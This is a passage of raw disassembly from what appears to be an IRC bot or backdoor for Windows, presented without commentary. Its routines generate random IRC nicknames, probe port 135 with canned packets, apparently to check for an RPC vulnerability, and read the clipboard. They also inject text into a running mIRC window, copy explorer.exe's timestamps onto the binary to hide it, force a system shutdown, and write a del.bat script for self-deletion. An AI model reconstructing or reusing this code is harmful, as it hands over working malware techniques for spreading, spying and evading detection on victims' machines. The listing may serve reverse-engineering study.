mov esi, dword_4D4A5C[esi]
cmp esi, ebx
jbe short loc_417DFD
push esi
call dword_4CBA6C ; closesocket
loc_417DFD: ; CODE XREF: sub_417C61+193�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_417C61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E06 proc near ; CODE XREF: sub_401ACD+319B�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_417E7F
loc_417E18: ; CODE XREF: sub_417E06+77�j
xor edi, edi
mov eax, offset dword_4D4A58
loc_417E1F: ; CODE XREF: sub_417E06+28�j
cmp [eax], ebx
jz short loc_417E30
add eax, 210h
inc edi
cmp eax, offset dword_4DB178
jl short loc_417E1F
loc_417E30: ; CODE XREF: sub_417E06+1B�j
cmp edi, 31h
jz short loc_417E7F
mov esi, edi
push [ebp+arg_0]
imul esi, 210h
lea eax, dword_4D4A64[esi]
push eax
call sub_41C890
mov eax, [ebp+arg_4]
pop ecx
mov dword_4D4C64[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov dword_4D4A58[esi], 1
push eax
push ebx
push edi
push offset sub_417C61
push ebx
push ebx
call ds:dword_427084 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_417E18
loc_417E7F: ; CODE XREF: sub_417E06+10�j
; sub_417E06+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_417E06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E84 proc near ; CODE XREF: sub_401ACD+36FD�p
; sub_401ACD+3747�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41BF70
add esp, 0Ch
call sub_41C2C2
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul ds:dbl_4276D8
call sub_41D174
cmp eax, 1
jnz short loc_417ECE
call sub_41C2C2
call sub_41C2C2
push 66h
cdq
pop ecx
idiv ecx
push off_438A68[edx*4]
jmp short loc_417EE7
; ---------------------------------------------------------------------------
loc_417ECE: ; CODE XREF: sub_417E84+2F�j
call sub_41C2C2
call sub_41C2C2
cdq
mov ecx, 0C0h
idiv ecx
push off_438768[edx*4]
loc_417EE7: ; CODE XREF: sub_417E84+48�j
lea eax, [ebp+var_2C]
push eax
call sub_41C890
pop ecx
lea eax, [ebp+var_2C]
pop ecx
push ebx
push esi
push edi
push eax
call sub_41B9C0
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov [ebp+var_C], eax
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276D0
call sub_41D174
mov ebx, eax
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_4276C8
call sub_41D174
cmp esi, 2
mov edi, offset a__1 ; "-|`_\\{[]}"
jle short loc_417F5A
cmp esi, 3
jnz short loc_417F51
cmp ebx, 1
jz short loc_417F5A
loc_417F51: ; CODE XREF: sub_417E84+C6�j
cmp eax, 1
jnz loc_418014
loc_417F5A: ; CODE XREF: sub_417E84+C1�j
; sub_417E84+CB�j
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276C0
call sub_41D174
push off_438A68[eax*4]
lea eax, [ebp+var_40]
push eax
call sub_41C890
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+var_2C]
push eax
push edi
call sub_41C990
add esp, 10h
test eax, eax
jnz short loc_418001
movsx eax, [ebp+var_40]
push eax
push edi
call sub_41C990
pop ecx
test eax, eax
pop ecx
jnz short loc_418001
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
dec esi
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], esi
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
call sub_41D174
cmp eax, 1
jnz short loc_418001
push edi
call sub_41B9C0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-8]
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-8]
fmul ds:dbl_4276C8
call sub_41D174
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_418001: ; CODE XREF: sub_417E84+111�j
; sub_417E84+122�j ...
push [ebp+var_C]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41CBC0
add esp, 0Ch
loc_418014: ; CODE XREF: sub_417E84+D0�j
lea eax, [ebp+var_2C]
push eax
call sub_41B9C0
mov esi, eax
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+var_2C]
push eax
mov [ebp+var_4], esi
call sub_41DEE8
pop ecx
test eax, eax
pop ecx
jnz loc_41827C
and [ebp+var_C], eax
movsx eax, byte ptr [ebx-1]
push eax
push edi
call sub_41C990
pop ecx
test eax, eax
pop ecx
jnz loc_418173
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
call sub_41D174
cmp esi, 3
jz short loc_418082
cmp eax, 1
jnz loc_418173
loc_418082: ; CODE XREF: sub_417E84+1F3�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_4180C4
push edi
call sub_41B9C0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_4276C8
call sub_41D174
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_4180E0
; ---------------------------------------------------------------------------
loc_4180C4: ; CODE XREF: sub_417E84+207�j
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call sub_41D174
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_4180E0: ; CODE XREF: sub_417E84+23E�j
push 1
inc esi
pop ebx
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B0
call sub_41D174
cmp esi, 3
jz short loc_418109
cmp eax, ebx
jnz short loc_418173
loc_418109: ; CODE XREF: sub_417E84+27F�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_41814E
push edi
call sub_41B9C0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_4276C8
call sub_41D174
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_41816C
; ---------------------------------------------------------------------------
loc_41814E: ; CODE XREF: sub_417E84+28F�j
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call sub_41D174
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_41816C: ; CODE XREF: sub_417E84+2C8�j
inc esi
mov [ebp+var_C], ebx
mov [ebp+var_4], esi
loc_418173: ; CODE XREF: sub_417E84+1C9�j
; sub_417E84+1F8�j ...
cmp esi, 6
jge loc_4181FC
cmp esi, 5
jge short loc_418194
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276D0
jmp short loc_4181B2
; ---------------------------------------------------------------------------
loc_418194: ; CODE XREF: sub_417E84+2FB�j
call sub_41C2C2
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
loc_4181B2: ; CODE XREF: sub_417E84+30E�j
call sub_41D174
test eax, eax
jnz short loc_4181D5
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A8
call sub_41D174
mov cl, 30h
jmp short loc_4181F2
; ---------------------------------------------------------------------------
loc_4181D5: ; CODE XREF: sub_417E84+335�j
cmp eax, 1
jnz short loc_4181FC
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call sub_41D174
mov cl, 41h
loc_4181F2: ; CODE XREF: sub_417E84+34F�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_4181FC: ; CODE XREF: sub_417E84+2F2�j
; sub_417E84+354�j
cmp [ebp+var_C], 2
jge short loc_41827C
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_4276C8
call sub_41D174
cmp eax, 1
jnz short loc_41827C
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A8
call sub_41D174
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A0
call sub_41D174
cmp eax, 1
jnz short loc_41827C
cmp [ebp+var_C], eax
jge short loc_41827C
call sub_41C2C2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_427698
call sub_41D174
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_41827C: ; CODE XREF: sub_417E84+1B1�j
; sub_417E84+37C�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_41BFD0
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_417E84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418295 proc near ; CODE XREF: sub_4182CD+125�p
; sub_4182CD+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_4182C3
loc_4182A6: ; CODE XREF: sub_418295+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41DF40
add esp, 0Ch
test eax, eax
jz short loc_4182C9
inc esi
cmp esi, edi
jl short loc_4182A6
loc_4182C3: ; CODE XREF: sub_418295+F�j
xor al, al
loc_4182C5: ; CODE XREF: sub_418295+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4182C9: ; CODE XREF: sub_418295+27�j
mov al, 1
jmp short loc_4182C5
sub_418295 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182CD proc near ; CODE XREF: .text:0040DFD7�p
; .text:0040E0C0�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_41C500
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_41830E
dec eax
jz short loc_4182EC
dec eax
loc_4182E6: ; CODE XREF: sub_4182CD+57�j
xor eax, eax
loc_4182E8: ; CODE XREF: sub_4182CD+3F�j
; sub_4182CD+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4182EC: ; CODE XREF: sub_4182CD+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_4CBA14 ; inet_addr
push eax
call sub_40C34B
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_4182E8
; ---------------------------------------------------------------------------
loc_41830E: ; CODE XREF: sub_4182CD+13�j
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_4182E6
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40A8F0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4CB97C ; connect
cmp eax, edi
jz loc_41842A
push ebx
push 48h
push offset dword_439374
push esi
call dword_4CBA24 ; send
cmp eax, edi
jz loc_41842A
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4CB9EC ; recv
cmp eax, edi
jz loc_41842A
cmp [ebp+var_200E], 0Ch
jnz short loc_41842A
push ebx
push 18h
push offset dword_4393C0
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp eax, edi
jz short loc_41842A
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4CB9EC ; recv
mov esi, eax
cmp esi, edi
jz short loc_41842A
cmp [ebp+var_200E], 2
jnz short loc_41842A
push 10h
push offset dword_4393DC
lea eax, [ebp+var_2010]
push esi
push eax
call sub_418295
add esp, 10h
test al, al
jz short loc_41840A
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_41842A
; ---------------------------------------------------------------------------
loc_41840A: ; CODE XREF: sub_4182CD+12F�j
push 10h
push offset dword_4393F0
lea eax, [ebp+var_2010]
push esi
push eax
call sub_418295
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_41842A: ; CODE XREF: sub_4182CD+9B�j
; sub_4182CD+B2�j ...
push [ebp+arg_4]
call dword_4CBA6C ; closesocket
mov eax, ebx
pop ebx
jmp loc_4182E8
sub_4182CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41843B proc near ; CODE XREF: sub_401ACD+BD0�p
; sub_401ACD+C0D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_4184C6
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_4184C6
cmp [ebp+arg_8], esi
jz short loc_4184C6
cmp byte ptr [eax], 0
jz short loc_4184C6
push ebx
push edi
call sub_426465
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_4184C1
push [ebp+arg_4]
push edi
call sub_41C2E0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4184BA
sub eax, edi
push eax
push edi
push ebx
call sub_41BFD0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_41B9C0
push eax
push [ebp+arg_8]
push ebx
call sub_41CBC0
push [ebp+arg_4]
call sub_41B9C0
add eax, esi
push eax
push ebx
call sub_41C8A0
push ebx
push edi
call sub_41C890
add esp, 30h
mov esi, edi
loc_4184BA: ; CODE XREF: sub_41843B+3C�j
push ebx
call sub_41BA91
pop ecx
loc_4184C1: ; CODE XREF: sub_41843B+2B�j
mov eax, esi
pop ebx
jmp short loc_4184C8
; ---------------------------------------------------------------------------
loc_4184C6: ; CODE XREF: sub_41843B+C�j
; sub_41843B+13�j ...
xor eax, eax
loc_4184C8: ; CODE XREF: sub_41843B+89�j
pop edi
pop esi
pop ebp
retn
sub_41843B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184CC proc near ; CODE XREF: sub_401955+E9�p
; sub_410BFD+F4�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_41BF70
mov esi, [ebp+arg_0]
push esi
call sub_41B9C0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_418502
or eax, 0FFFFFFFFh
jmp short loc_418575
; ---------------------------------------------------------------------------
loc_418502: ; CODE XREF: sub_4184CC+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_418524
loc_41850E: ; CODE XREF: sub_4184CC+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_41851B
cmp dl, 0Dh
jnz short loc_41851F
loc_41851B: ; CODE XREF: sub_4184CC+48�j
and byte ptr [ecx+esi], 0
loc_41851F: ; CODE XREF: sub_4184CC+4D�j
inc ecx
cmp ecx, eax
jl short loc_41850E
loc_418524: ; CODE XREF: sub_4184CC+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_418555
lea edi, [ebp+var_7CC]
loc_418531: ; CODE XREF: sub_4184CC+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_418550
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_418550
cmp ebx, 1F4h
jge short loc_418555
mov [edi], ecx
inc ebx
add edi, 4
loc_418550: ; CODE XREF: sub_4184CC+69�j
; sub_4184CC+74�j
inc edx
cmp edx, eax
jl short loc_418531
loc_418555: ; CODE XREF: sub_4184CC+5D�j
; sub_4184CC+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_418573
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_41CD20
add esp, 0Ch
loc_418573: ; CODE XREF: sub_4184CC+8E�j
mov eax, ebx
loc_418575: ; CODE XREF: sub_4184CC+34�j
pop esi
pop ebx
leave
retn
sub_4184CC endp
; =============== S U B R O U T I N E =======================================
sub_418579 proc near ; CODE XREF: sub_4185D3+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_4185B2
push ebx
mov ebx, edi
loc_418596: ; CODE XREF: sub_418579+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_4185B5
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_418596
pop ebx
loc_4185B2: ; CODE XREF: sub_418579+18�j
pop edi
pop esi
retn
sub_418579 endp
; =============== S U B R O U T I N E =======================================
sub_4185B5 proc near ; CODE XREF: sub_418579+25�p
; sub_4185D3+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_41DFEC
cmp al, 61h
pop ecx
jl short loc_4185D0
cmp al, 7Ah
jg short loc_4185D0
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_4185D0: ; CODE XREF: sub_4185B5+E�j
; sub_4185B5+12�j
xor eax, eax
retn
sub_4185B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185D3 proc near ; CODE XREF: sub_415E19+10�p
; sub_415E4B+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_41C500
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41B9C0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_41B9C0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_418579
add esp, 14h
dec esi
mov edi, esi
loc_418611: ; CODE XREF: sub_4185D3+B6�j
test esi, esi
jle short loc_41868F
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41DFEC
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_41DFEC
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418687
loc_418637: ; CODE XREF: sub_4185D3+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_4185B5
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_418658
mov eax, ecx
loc_418658: ; CODE XREF: sub_4185D3+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_41868B
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41DFEC
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_41DFEC
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_418637
loc_418687: ; CODE XREF: sub_4185D3+62�j
dec edi
dec esi
jmp short loc_418611
; ---------------------------------------------------------------------------
loc_41868B: ; CODE XREF: sub_4185D3+8A�j
xor eax, eax
jmp short loc_418694
; ---------------------------------------------------------------------------
loc_41868F: ; CODE XREF: sub_4185D3+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_418694: ; CODE XREF: sub_4185D3+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4185D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418699 proc near ; CODE XREF: sub_401ACD+66C5�p
; sub_401ACD+76FF�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_427094 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_427164 ; FormatMessageA
lea eax, [ebp+var_100]
loc_4186D2: ; CODE XREF: sub_418699+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_4186DE
cmp cl, 9
jnz short loc_4186E1
loc_4186DE: ; CODE XREF: sub_418699+3E�j
inc eax
jmp short loc_4186D2
; ---------------------------------------------------------------------------
loc_4186E1: ; CODE XREF: sub_418699+43�j
; sub_418699+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_4186FB
mov cl, [eax]
cmp cl, 2Eh
jz short loc_4186E1
cmp cl, 21h
jl short loc_4186E1
loc_4186FB: ; CODE XREF: sub_418699+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_4DB17C
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41C360
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_418699 endp
; =============== S U B R O U T I N E =======================================
sub_418723 proc near ; CODE XREF: sub_401ACD+2470�p
push esi
push 0
call dword_4CB9A4 ; OpenClipboard
test eax, eax
jz short loc_41875A
push 1
call dword_4CB9C4 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_41875A
push edi
push esi
call ds:dword_42716C ; GlobalLock
push esi
mov edi, eax
call ds:dword_427168 ; GlobalUnlock
call dword_4CBA28 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41875A: ; CODE XREF: sub_418723+B�j
; sub_418723+19�j
xor eax, eax
pop esi
retn
sub_418723 endp
; =============== S U B R O U T I N E =======================================
sub_41875E proc near ; CODE XREF: sub_401ACD+74BF�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc_0 ; "mIRC"
push esi
push edi
call dword_4CB9E0 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_4187DA
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_427178 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_427174 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_41C266
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4CBA30 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4CBA30 ; SendMessageA
push ebx
call ds:dword_427170 ; UnmapViewOfFile
push edi
call ds:dword_427070 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_4187DC
; ---------------------------------------------------------------------------
loc_4187DA: ; CODE XREF: sub_41875E+16�j
xor eax, eax
loc_4187DC: ; CODE XREF: sub_41875E+7A�j
pop edi
pop esi
pop ebp
retn
sub_41875E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187E0 proc near ; CODE XREF: sub_401221+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4CBA90 ; SearchPathA
test eax, eax
jz short loc_41887F
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_4270F8
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_41887F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_427180 ; GetFileTime
push ebx
mov ebx, ds:dword_427070
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41887F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_42717C ; SetFileTime
push esi
call ebx ; CloseHandle
loc_41887F: ; CODE XREF: sub_4187E0+2A�j
; sub_4187E0+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4187E0 endp
; =============== S U B R O U T I N E =======================================
sub_418884 proc near ; CODE XREF: sub_401ACD+1682�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_419B9E
pop ecx
pop ecx
push 50005h
push 6
call dword_4CB914 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_418884 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188A6 proc near ; CODE XREF: sub_401ACD+270E�p
; sub_4167A0+472�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_429090, esi
push edi
jz short loc_4188CA
cmp dword_4CBAA4, esi
jnz short loc_4188CA
push esi
call sub_401000
pop ecx
loc_4188CA: ; CODE XREF: sub_4188A6+13�j
; sub_4188A6+1B�j
call sub_40B583
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4270B8 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_418A2A
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_4270F0 ; WriteFile
push edi
call ds:dword_427070 ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41BF70
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_41BF70
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43DB88
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_4270A4 ; GetModuleHandleA
push eax
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
